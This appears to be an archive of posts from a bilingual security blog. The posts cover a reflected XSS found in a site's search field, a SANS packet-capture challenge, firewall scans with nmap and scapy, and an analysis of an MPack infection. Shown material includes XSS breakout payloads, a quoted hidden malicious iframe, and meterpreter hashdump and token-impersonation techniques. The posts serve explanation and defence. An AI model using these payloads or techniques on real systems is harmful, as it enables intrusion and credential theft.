You are currently browsing the category archive for the ‘Security testing’ category.

I was kind of looking (pentester way) on a website and I saw that they could have a XSS flaw on the search field. Inserting the following string „<b>tester” on the search field, it get reflected back but just on the <title> tag like this.

<title>Cauta <b>tester – ……………</title>

There is a classical XSS, but what made that one interesting to me was the <title> tag.

<title>Cauta<script>alert(1);</script> – ……………</title>  => is not working

but

</title><script>alert(1)</script>&submit=Cauta => is working

Speaking with a friend, he gave me also an alternative the idea of inserting the <body> tag and create in this way a new HTML document.

So:

</title><body onload=’javascript:alert(1)’>

worked also like a charm.

Anunțuri

If I need to say thank you to someone for a nice time and for having fun, that would be Ed Skoudis. And If I need to hate someone for some nights without sleep, that would be definitely Ed.

But lets start with the beginning. I was kind of motivated by Ed’s post on the SANS web page to get over my old Turbo Pascal/Bash programming knowledge and move to something else like Python. And because I got some spare time around Christmas I decide myself to use Python for solving ED’s Christmas challenge (http://pen-testing.sans.org/holiday-challenge). I updated my Python install on Windows and got a big cup of tee (Phu Erh).

After I downloaded the pcap file and load that in wireshark I go normally to the Statistics -> Conversations and Statistics -> Endpoints in order to get some ideas regarding the kind of traffic that I’m dealing with.

First TCP conversations is a SMTP  conversation. In order to filter the SMTP traffic you can type smtp on the filter windows.

Selecting one of the packets and after this from the menu Analyse-> Follow TCP Stream, you can can see the SMTP conversation that contain an e-mail with an attachment. This attachment is a base64 encoded. In order to decoded I decide to use my „fu” in python.

import base64

a = []

newtext = []

inputstring = „”

inputfile = open(r”c:\smtptraffic.txt”,”r”)

for line in inputfile:

a.append(line.strip())

inputstring = „”.join(a)

inputfile.close()

outputfile = open(r”c:\Letter2Mel.doc”,”w”)

outputstring = base64.b64decode(inputstring)

outputfile.write(outputstring)

outputfile.close()

I was kind of happy when I did get the output,  but trying to open the file I got an error from the Microsoft Word that the file was corrupted. Checking in a hex editor I was kind of surprised because I was able to see the Microsoft Word file header ( EC A5 C1 00 with a 512 byte offset )  and read the text,  but I was not able to open it. By the way, a good source for information about this can be found at http://www.garykessler.net/library/file_sigs.html .

Python was helping me to check the right position of the header with the function:

>>>int(0x200)

521

I moved forward with the analyses and got the SQL code injection, DNS replacement, Shell download and SQLite „magic” to plant the fake position on the Iphone backup file, but I was not really ready to submit my response because the first part was kind of „not wright”.

I start to have a look on other Python library binascii with the function  in order to get the file decoded but I  get the same result.

a2b_base64(string)

Convert a block of base64 data back to binary and return the binary data. More than one line may be passed at a time.

Asking around what could be the reason for not being able to open the file,  I was asked by someone if there was no malware embedded on the document.. Why the hell I did not thought about that. (Thanks Stefan). A check on virustotal for the md5 hash (761c786733a586aac8d8da0ce8e5dde6) came empty. No one uploaded the file until now. Ok!

On the http://www.reconstructer.org/ , Frank Boldewin offer some software that is able to detect malware on office documents.

C:>OfficeMalScanner.exe L

etter2Mel_v0.doc scan

+––––––––––––––+

|           OfficeMalScanner v0.53         |

|  Frank Boldewin / www.reconstructer.org  |

+––––––––––––––+

[*] SCAN mode selected

[*] Opening file Letter2Mel_v0.doc

[*] Filesize is 19467 (0x4c0b) Bytes

[*] Ms Office OLE2 Compound Format document detected

[*] Scanning now…

Analysis finished!

–––––––––––––––––––––––

No malicious traces found in this file!

Assure that this file is being scanned with the „info” parameter too.

–––––––––––––––––––––––

Running the info option make me to wonder more and more. (the software just crushed). This is not f….ing  good. Maybe I missed something.

After some days I did ask one of my friends if he had a look on the challenge and he told me that everything worked well, he used also Python to decode the file and surprise..he was able to open the document. Damn again. The only difference between me and him was that he used Linux for decoding the file. This can not be.

Can I run into a Python  bug? This can not be. In this point I started to update my script and create a md5 hash of the values „before” and „after”  the decode function:

import md5

….

Text skipped

..

m = md5.new()

m.update(inputstring)

print „the hash of the input string is: ” + m.hexdigest()

m.update(outputstring)

print „the hash of the input string is: ” + m.hexdigest()

The values were the same with the linux version but still the  output was different. The only remain point was the write function in Python that was suppose to write the doc to the disk.

And ….damn one more time…I just realize that I was writing a binary to disk and I need to tell  to my script that the value is binary.

outputfile = open(r”c:\Letter2Mel.doc”,”wb„)

But why is not happening the same in Linux? I  thought for 10 sec that this was Ed’s evil way to punish the Windows fellows. But I finished, not looking for blame, being late for submission and  happy with the challenge.

Thank you Ed, was really fun…

PS. I.m pretty sure that Grandma is using BackTrack for sending mails, because of the X-X-Sender header on SMTP message created by the Pine like software used for writing the mail:

From: Grandma <root@grandma.gma>

X-X-Sender: root@bt

To: cousinmel@mail.gma

Wireshark are intre timp si un pluggin de GEOip. Ce inseamna asta? Se pot corela foarte usor informatiile de locatie cu adresele de IP pentru o mai buna vizibilitate asupra traficului.

Primul lucru care trebuie verificat este daca versiunea instalata a fost compilata cu suport de GeoIP. Informatia se poate afla daca se acceseaza meniul Help -> About Wireshark. La sectiune de compilare se afla pluggin-urile cu care a fost compilat.

Daca GeoIP-ul este unul dintre ele, pasul urmator este sa faci download la baza de date cu informatiile GeoIP de aici. Documentatia originala de instalare cat si cateva exemple de filtre bazate pe informatiile GeoIP se gasesc aici.

Pentru a putea vizualiza informatiile accesati meniul Statistics -> Endpoints -> IPv4 tab. O sa aveti o surpriza apasand obtiunea de Map. Dar mai bine va las pe voi sa o descoperiti.

BTW exista si pluggin de SNORT pentru Wireshark (WireShnork). Mai multe info aici

Have Fun

Ascultand un podcast, am auzit de o veche problema de securitate a unor Firewall-uri care permiteau access nelimitat setand portul sursa 0. Cum se poate verifica in practica?
Nmap:
nmap -sS -p80 –source-port 0 192.168.178.1
sau:
scapy:
>>ans,unans = sr(IP(dst=”192.168.178.1″)/TCP(sport=0,dport=80),n timeout=0.1)
>>ans.summary()

Si pentru ca scapy + python rock, se poate scana si asa :
>>ans,unans = sr(IP(dst=”192.168.178.1″)/TCP(sport=[0,53],dport=80), timeout=0.1)
>>ans.summary()

Have Fun.

HTTP-ul ca protocol nu a fost niciodata gandit sa suporte conceptul de sesiuni. De aceea au fost introduse elemente suplimentare care sa contina informatia de stare, cum ar fii cookie-urile sau ID-urile de sesiune.

Acum se profileaza o noua ideea ca in momentul actual informatiile care identifica browser-ul vostru, pot oferi atitea elemente de unicitate incit sa  poata fi folosit in viitor ca element de identificare al sesiunilor. Care este avantajul? Informatiile stau pe server si nu sint direct modificabile de utilizator.

Electronic Frontier Foundation (EFF) a creeat un nou tool online denumit Panopticlick care calculeaza unicitatea browser-ului vostru bazat pe informatii cum ar fi User Agent-ul, header-ele HTTP acceptate, plug-in-urile din browser, time zone, dimensiunea screen-ului si storage settings-uri.

Nu stiu daca aceste informatii vor fi de ajuns pentru a putea inlocui mecanismele actuale de mentinere a sesiunii, dar sint convins ca sint o baza reala pentru procesele de computer forensic.

Pe blogul Microsoft a aparut o analiza interesanta despre sistemele care sint afectate de noul exploit „Aurora” si un link catre solutia propusa de ei, care consta in activarea optiunii de DEP pentru Internet Explorer. Aceasta se face prin instalarea urmatorului patch.  Cealalta solutie, de dezactivare a scripturilor java, este nereala in Internetul actual.

Have fun.

Din testele mele, exploitul este stabil pentru IE6, dar duce doar la distrugerea instantei de IE7 sau 8.

Ieri am citit un articol interesant in numarul 21 al revistei Insecure, in care Didier Stevens descrie o modalitate inedita in care poate fi compromis un calculator. El foloseste pentru exemplificare bug-ul procesorului de imagine JBIG2 al soft-ului Adobe Acrobat Reader si arata ca nu este nevoie de deschiderea unui document pentru a fi cumpromis un calculatorul ci pur si simplu un simplu view in Windows Explorer este de ajuns.

Cum functioneaza?  La instarea multor soft-uri se aduc si „imbunatatiri” Shell-ului de windows, permitindu-i acestuia sa poate citi informatii suplimentare despre anumite tipuri de fisiere. De exemplu, in cazul PDF-urilor, se pot viziona in windows explorer informatii suplimentare cum ar fi autorul documentului. Aceasta inseamna automat o procesare a fisierului. Deci daca se introduce codul care executa exploatarea in portiunea ce va fi procesata de extensia de PDF a shell-ului, atunci procesul de exploatare are loc fara sa fie nevoie de deschiderea fisierului.

Solutia propusa de el este dezintalarea extensie de shell pentru documentele PDF.  Simplu, dar nu la indemina tuturor utilizatorilor.  Exista si alte soft-uri care ofera aceeleasi tip de „imbunatatiri”. VLC si Winzip sint doar 2 care imi vin in minte.

Articolul integral poate fi citi aici:

Have fun :-)) and try this only at home .

Cu toate ca a fost prezentat deja la Blackhat DC in februarie anul asta, nu am auzit pina acum de tool-ul „SSLStrip” scris si prezentat de Moxie Marlinspike. Despre ce este vorba? Conceptul este simplu si genial in acelasi timp. Modul in care oamenii ajung sa acceseze linkurile de HTTPS este de obicei prin click-ul unor butone/linkuri din pagini normale HTTP, care apoi trimite informatia prin HTTPS serverului. Un exemplu este pagina http://www.raiffeisen.ro unde in pagina HTTP este introdusa username-ul si parola care sint apoi postate prin HTTPS catre https://www.raiffeisen.ro/ . A doua modalitate este scrierea numelui de domeniu (ex: paypal.com) in bara de URL a browserului. Acesta trimite o cerere prin HTTP serverului care la rindul lui genereaza un raspuns din parte serverului de genul 302. Redirectare catre pagina HTTPS.

Ce face SSLStrip. Se interpune intre user si server si in momentul in care userul incearca sa acceseze pagina HTTPS, el va face cererea in numele clientui catre server pe HTTPS, primeste raspunsul si il livreaza pe HTTP userului. Pentu a reusi sa pacaleasca userului soft-ul se foloseste si de un trick ingenios inlocuind „Favorit Icon” cu iconita de lacatel, dind impresia de conexiune securizata. Interesante sint si rezultatele pe care le-a obtinut in urma rularii soft-ului in unul din nodurile de iesire a retelei TOR. Numarul de parole, sau carduri de credit este destul de mare. Ma astept deci ca numarul de astfel de atacuri folosind reteaua TOR sau retele Wireless sa creasca.

Ce poate ajuta impotriva unui astfel de atac ? Phising  filter-ul de la IE  activat sau in Firefox 3 (about:config) browser.identity.ssl_domain_display este setat 1 ?Da ,atit timp cit userul chiar va face click pe iconita pentru a verifica ca acela nu este un Fake „Favotite Icon” ci ca este chiar modalitatea browser-ului de a indica ca este un certificat SSL.

Prezentarea si tool-ul pot fi gasite aici.

Have Fun.

Un juriu format din Rich Mogull, Chris Hoff, H D Moore si Jeff Forristal , dupa cum ne informeaza blogul lui Jeremiah Grossman, a desemnat GIFAR cea mai  buna metoda de exploatare a anului 2008 . Prezentata prima data in august 2008 la Blackhat de catre  Nathan McFeters, John Heasman, Rob Carter noul concept propune inserarea unui cod java intr-o imagine GIF (GIF+JAR)=GIFAR. Noua „imagine” va reusi sa treaca peste restrictiile legate de „same origin policy” care restrictioneaza modalitatea in care limbajele de programare care ruleaza in browser acceseaze alte resurse sau metode decit cele din domeniul de unde provin. Ce inseamna asta: un script de pe site-ul Evil.com nu poate accesa cookie-ul din domenul mybank.com.

Dar acum, datorita faptului ca Java nu tine cont de aceasta restrictie exista posibilitatea ca daca concomitent navigam pe site-ul evil.com acesta sa poata accesa resursele site-ului mybank.com.  Scripturi java pot fi inserate si in documente Word2007 sau alte resurse cum ar fii video-uri. Aplicatie imediata? Facebook (care intre timp a fost patch-uit) sau alte site-uri colaborative.  Odata logat pe Facebook si accesind alta pagina, contul tau (cookie-ul) tau este furat. Intreaga prezentare poate fi citita aici si un video despre cum se face aici.

Protectie? Patch your java.

Have fun.

Astazi a fost facut publica versiunea beta 4 a celebrei platforme de penetration testing Backtrack. Pe linga versiunea ISO este posibil si download-ul unei versiuni vmware. Un mic review o sa urmeze. Dowload-ul se poate face de aici.

Have fun.

Am avut sansa intr-un audit, in care s-au intamplat multe si despre care poate o sa mai povestesc, sa fac un test de securitate pentru un domeniu Windows securizat foarte bine, unde Domain Controller-ele nu foloseau sau stocau parole in format LM Hash. Am reusit sa gasesc o statie care nu facea parte din procesul de patch regulat care era aplicat intregului domeniu. Pe aceasta statie am devenit administrator local si cu ajutorul hashdump-ului din meterpreter am reusit sa obtin parolele salvate pentru utilizatorii care s-au logat pe aceasta statie. Problema era ca politica de domeniu forta complexitatea si lungimea parolei. John the Ripper, dupa 62 de zile, nu a reusit sa obtina nici o parola.

62:04:57:04 – Expanding tables for length 8 to character count 38

62:04:57:04 – Trying length 8, fixed @7, character count 38

Solutia: Ce este un token de access al unui proces in windows?  Este un obiect care descrie contextul de securitate al unui proces. Mai multe despre token-uri aici . Ce se poate face cu aceste token-uri?  In momentul in care esti logat pe o statie si ai drepturi de SYSTEM poti sa impersonezi temporar unul din token-urile create de logarea unui administrator de domeniu si sa reusesti sa executi comenzi in contextul lui. Prezentarea de la Defcon 15 aici . Pentru asta exista suita de utilitare numita incognito . Ea este acum prezenta si in framework-ul 3.2 de la Metasploit. Optiunea find_token permite listarea token-urilor existente si optiunea execute permite lansarea unui executabil in contextul dorit.

Have fun next time. 😉

Internet Explorer ofera intotdeuna posibilitatea de a salva parolele pentru a putea fii folosite ulterior la autentificarea in diferite site-uri de internet. Problema apare atunci cind aceste seturi de username/parola nu sint salvate intr-un loc protejat. Ieri am descoperit un utilitar IEPass care este in stare sa citeasca combinatiile de username/parola pe care Internet Explorer le-a salvat.  IE 7 incearca sa salveze parolele in alte locuri in registri dar acest utilitar este in masura sa le citeasca.

La Firefox problema este mai bine rezolvata, prin existenta container-ului de parole. Totusi daca acesta nu este protejat cu parola fisierele ce contin parolele pot fii exportate pe alt calcualtor si decodificate. In cazul in care containerul este protejat cu o parola exista utilitare care pot ataca prin metoda „brute-force” in incercarea de a gasi parola. Utilitarele de decodificare si de brute-force pot fii gasite aici.

Aceste utilitare reprezinta un plus pentru cazurile de Forensic, pentru ca ajuta la gasirea posibilelor parole pe care user-ul le-a folosit in Internet Explorer sau Firefox si totodata pentru criptarea anumitor fisiere.
Have fun.

Ma hotarisem sa nu scriu despre MPack pentru ca consideram ca este prea cunoscut ca sa mai fie un subiect care sa intereseze pe cineva. Dar se pare ca am fost contrazis de realitate. Astazi am primit urmatorul mail.

Buna ziua

Lucrez la o institutie publica din domeniul sanatatii si ma ocup de partea de IT. Relativ de curind Ministerul Sanatatii si-a actualizat site-ul (http://www.ms.ro/) pastrind totusi activa si varianta veche care este accesibila din noul site http://www.ms.ro / ms_vechi.asp .

Problema (grava) este ca acesta din urma este infectat cu MPack (Wikipedia, http://code-foundation.de/2008/01/31/hunting-mpack-in-the-wild/) un mallware foarte agresiv si ‘eficient’.

Poate gasiti un spatiu pe blogul dumneavoastra in care sa atrageti atentia asupra acestei probleme care afecteaza site-ul unei institutii publice importante din Romania (nu am gasit o adresa de email a webmaster-ul si oricum ma indoiesc ca ar fi folosit la ceva).

Cu stima,
V. M.

Numele domnului care mi-a scris l-am trecut sub anonimat pentru ca nu am obtinut acordul lui, iar adresa paginii de web am scris-o intentionat trunchiat pentru a nu cumva cineva sa aiba ideea de a da click, decit daca stie ce face.

Prima data am analizat versiunea 0,94 a celebrului pachet MPack in decembrie. Am fost impresionat de modul in care functioneaza si de infrastructura care sta in spate.

Dar ce este de fapt MPack si care este vectorul de atac? Pachetul care poate fi obtinut de pe piata neagra pentru preturi variind intre 300 si 1000 de USD, contine scripturile de instalare a interfetei web scrisa in PhP si a unei baze de date mySQL care este folosit ca centru de comanda. Aici sint strinse informatiile despre hosturile noi care au fost explatate cu succes si inclusiv o distributie pe tari. A doua parte sint exploiturile in sine care au ca obiectiv browser-ul in sine (Internet Explorer, Firefox sau Opera) sau plugins-urile sau BHO-urile aferente (QuickTime Player, VLC, Acrobat Reader) urmate de instalarea unui root-kit care permite centrului de comanda sa controleze calculatorul infectat. BHO (Browser Helper Object) in lumea IE-ului sau extensile de la Firefox ajuta browser-ul pentru a putea sa prezinte continutul unui site de web in cazul in care browser-ul in sine nu o poate face. De exemplu filmele pot fii prezentate prin invocarea de catre browser a programului Qicktime Player.

Dar care este anatomia unui atac si cum funtioneaza in cazul Ministerului Sanatatii. Cineva a descoperit ca poate modifica continutul fisierului de pe site-ul ministerului sanatatii. Si a si facut-o incluzind un iframe invizilbil in pagina Ministerului sanatatii care redirectioneaza browserul catre site-ul http://updateservernet.cn si executa fisierul tank.php.

mpack.png

Iframe-urile au fost initial concepute pentru a putea prezenta in site-ul propriu in timp real continutul altui site. Acelasi lucru este folosit si aici unde browserul unui utilizator obisnuit este redirectionat automat catre un alt site fara cunostinta acestuia.

Pe aceste site se gaseste o pagina care contine un alt iframe ce redirectioneaza catre un al doilea site cum se poate vedea mai jos.

iframe src=”http : // 195 . 2 . 253 . 203 / w / wtsin.cgi?s=z” style=”display:none”></iframe

care face apoi redirectarea catre  http : // 195 . 2 . 253 . 203 / sp / index.php

Aici are loc exploatare propriuzisa fiind livrat un pachet de exploit-uri in funtie de browserul care acceseaza pagina, urmata de instalarea unui root-kit.

mpack2.png

Simplu nu??

Ce se poate face un user normal?

  • Antivirusul la zi cu toate ca Mpack-ul are posibilitatea de a livra noi exploituri care nu sint recunoscute imediat de producatorii de antivirus.
  • Evitarea de a naviga pe internet folosind contul de administrator.
  • Update-ul tuturor softurilor care sint folosite de catre Internet Explorer sau Firefox (Quicktime Player, VLC, etc) sau chiar dezactivarea lor.
  • Dezactivarea posibilitatii de a rula scripturi Java cu toate ca aceasta optiune este din ce in ce mai greu de pus in aplicare datorita constructiei site-urilor de Internet.
  • sau…ce spunea unul din creatorii Mpack-ului intr-un interviu in Securit Focus.

I would advise you to use the Opera browser with scripts and plug-ins disabled in order not to be caught by the MPack someday.

Mai multe informatii despre constructia pachetului MPack se poate gasi pe site-ul Antivirusului Panda.

Mi-as dori mai multa atentie din partea departamentelor de IT care sint subordonate Ministerelor, nu numai pentru ca in primul rind sint responsabile de securitatea retelelor si site-ului proprii dar si datorita faptului ca fiind institutii publice au un numar de accesari foarte mare care poate duce ca in cazul de fata la infectari dramatice.

P.S. Cautarile mele ca si ale domnului V.M de a gasi o persoana de contact raspunzatoare de site-ul Ministerului Sanatatii au fost soldate cu un esec lamentabil si deci daca cineva cunoaste pe Cineva in Ministerul Sanatarii va rog sa-i contactati sa-si curete ograda. Multumesc.

Anul trecut la Defcon una din cele mai interesante presentari a fost cea a lui HD Moore „Tactical Explotation” in care a fost avansata ideea ca nu este nevoie intotdeauna sa folosesti super exploit-uri pentru a reusi sa obtii access in reteaua unei companii. Informatiile oferite de google si alte site-uri de social networking ofera o baza solida pentru a face rost de conturi care apoi pot fii folosite in procesul de brutforce sau social engineering. Un tool foarte interesant in acest domeniu este metagoofil oferit de cei de la Edge Security. Folosind utilitarul extract din Linux, care extrage metainformatiile continute de un document word, excel, powerpoint sau pdf, metagoofil cauta pe google toate documentele care au fost indexate de motorul ca cautare, acceseaza site-ul, le download-aza si apoi extrage informatiile aflate in cimpurile de metadata care de obicei contin numele autorului sau chiar numele user-ului, plus locatia unde a fost salvat.

sintaxa este:

#python metagoofil.py -d mydomain.test -l 100 -f all -o /tmp/mydomain.test.html -t /tmp/mydomain.test

unde:

-d este domeniul de analizat.

-l limita rezultatelor cu care sa lucreze (default este 100)

-f tipul de fisiere ce trebuie analizate (all, pdf, xls, doc, ppt, odp,ods, etc)

-o output-ul in fromat html

-t directorul target unde se salveaza datele.

Incercati sa rulati utilitarul impotriva propriei companii sa vedeti cite date sint expuse prin aceasta metoda. Veti fi surprinsi de rezultate. 🙂

Si daca tot sintem aici incercati sa vedeti ce gaseste Paterva, despre compania proprie.

Un tutorial online despre metagoofil poate fi urmarit aici.

Btw, acum puteti urmarii online presentare de la Defcon a lui HD Moore.

Have a lot of fun.

M-am intrebat de multe ori de ce o compania ca Oracle implementeaza o functie absolut inutila in pachetul care ar trebui sa asigure validarea parametrilor pentru functiile PLSQL. Functia DBMS_ASSERT.NOOP nu face altceva decit ” The NOOP (No Operation) function performs no error checking and returns the input string as it was entered.” dupa cum este descris aici. Dupa o discutie interesanta avuta astazi cu Alexander Kornbrust am reusit sa-mi dezlege misterul. Compania Oracle foloseste un soft produs de firma Fortify care face analiza codului sursa al intrebului server Oracle. Si pentru ca developeri nu au nici o idee care sint implicatiile dpdv al securitatii a codului pe care il scriu si pentru ca totodata nu inteleg ei insisi cum sa foloseasca dbms_assert, atunci folosesc functia NOOP care nu face altceva decit sa prosteasca soft-ul de analiza. Ingenios nu? Si dupa asemenea fapte cine mai are incredere in Oracle?
Have fun and long life Oracle. (va da intotdeuna o piine oamenilor de securitate).

Acum 2 saptamini l-am intilnit pe Thorsten Holz conducatorul Chapter-ului german al proiectului Honeypot. L-am intrebat daca nu ar fi interesant in deschiderea unei Chapter romanesc. Mi-a spus ca deja a primit o cerere din parte unei firme de securitate romaneasca care era interesata dar propunerea nu a fost concretizata. Este interesat cineva in asa ceva? Merita sa punem pe picioare un astfel de proiect. Astept comentariile voastre.

Ce este DEP? DEP (Data Execution Prevention) este un pachet de tehnologii Hardware si Software care au ca scop protejarea accesului la memorie a programelor executabile. Cel putin asa defineste Microsoft-ul in articolul sau in Technet. Dar citeodata pentru a putea sa faci analiza unui malware este important sa se poata fi oprit DEP-ul.

Cum se face? In boot.ini se scrie:

/noexecute=AlwaysOff

(Atentie, sintaxa este case sensitiv). Restul optiunilor sint explicate frumos si clar de Microsoft.

Have fun.

S-a creat multa confuzie in urma problemelor detectate prima data in Iunie in modul in care aplicatiile complementare interactioneaza cu Internet Explorer-ul si ultimul Security Adviser 943521 care se refera la modul in care Internet Explorer 7 instalat pe platforma Windows XP sau Windows 2003 treateaza URI-urile. Dar haide sa facem putina lumina.

Ce sint URI-urile . Conform definitiei din Wikipedia reprezinta un sir compact de caractere folosit pentru a identifica o resursa. Scopul lor este de a permite interactiunea cu diferite resurse din retea folosind anumite protocoale de comunicatie. Exemplul cel mai elocvent si cunoscut este http://. De exemplu https://securityaspects.wordpress.com care inseamna ca:

  • resursa (pagina de web HTML) va fi interpretata folosint un program care interpreteaza cod HTML in cazul nostru browserul
  • poate fi obtinuta folosind protocolul http de la o anumita locatie (site-ul de web).

Sintaxa unui URI este protocol :resursa  Important de mentionat ca sintaxa accepta si alti parametrii care vor fii tratati de aplicatia caruia ihi este adresat ca parametrii. Alte exemplu celebrú este maito:adresademail@domeniu care care inseamna ca resursa va fii interpretata de programul default de mail din sistem si va folosi protocolul de mail (SMTP) pentru a indetifica resursa, adresa destinatarului.

Acum ca am vazut ce este un URI haide sa vedem ce se intimpla de fapt.

In Iunie s-a demonstrat ca Windows API-urile nu filtreaza URI-ule corect in momentul interactiunii dintre un browser si o aplicatie complementara cu ar fii Skype sau Acrobat Reader. Microsoftul a remediat ce a putut dar a recomandat ca si cei care fac aplicatii sa verifice URI-urile in momentul in care sint tratate de aplicatiile lor.

In Iulie s-a semnalat insa ca IE7 este cel care nu trateaza corect URI-ule.

Ce se intimpla? IE 6 de exemplu, primeste URI-ul si incearca sa-l valideze din punct de vedere al sintaxei. Este valid, atunci este trimis catre Windows shell32 function ShellExecute() pentru a fii executat. Nu este valid,  atunci IE-ul reactioneaza normal si se intoarce la starea initiala abandonind executia. La IE 7 pe platforma Windows XP sau 2003, browserul in momentul in care detecteaza ca URI-ul nu este valid, incearca sa-l repare dar toata procedura nu este implementata corect si se poate transmite cod personal catre functia ShellExecute().

Modalitatile de exploatare sint prin convingerea victimei de a accesa o resursa web ( a da click pe un link care are o anumita structura).

Ce se poate face? Patch , patch si atentie la toate URI-urile care sint inregistrate in sistemul vostru. Cu cit sint mai putine, cu atit suprafata de atac este mai mica.

Have fun,

De citit:

Google are un blog foarte interesant de securitate. Merita citit articolul despre search worms si cel despre fuzzere. Un site care merita toata atentia.

Cind este vorba despre o retea wireless pentru vecini, da….folosesc WEP. Nu au nevoie de mai mult. Dar cind e vorba despre o ambasada, atunci este mult mai serios. So…don’t use WEP for government institutions! How about WPA?

irishembassy1.png

Noiembrie 2017
L M M M V S D
« Mar    
 12345
6789101112
13141516171819
20212223242526
27282930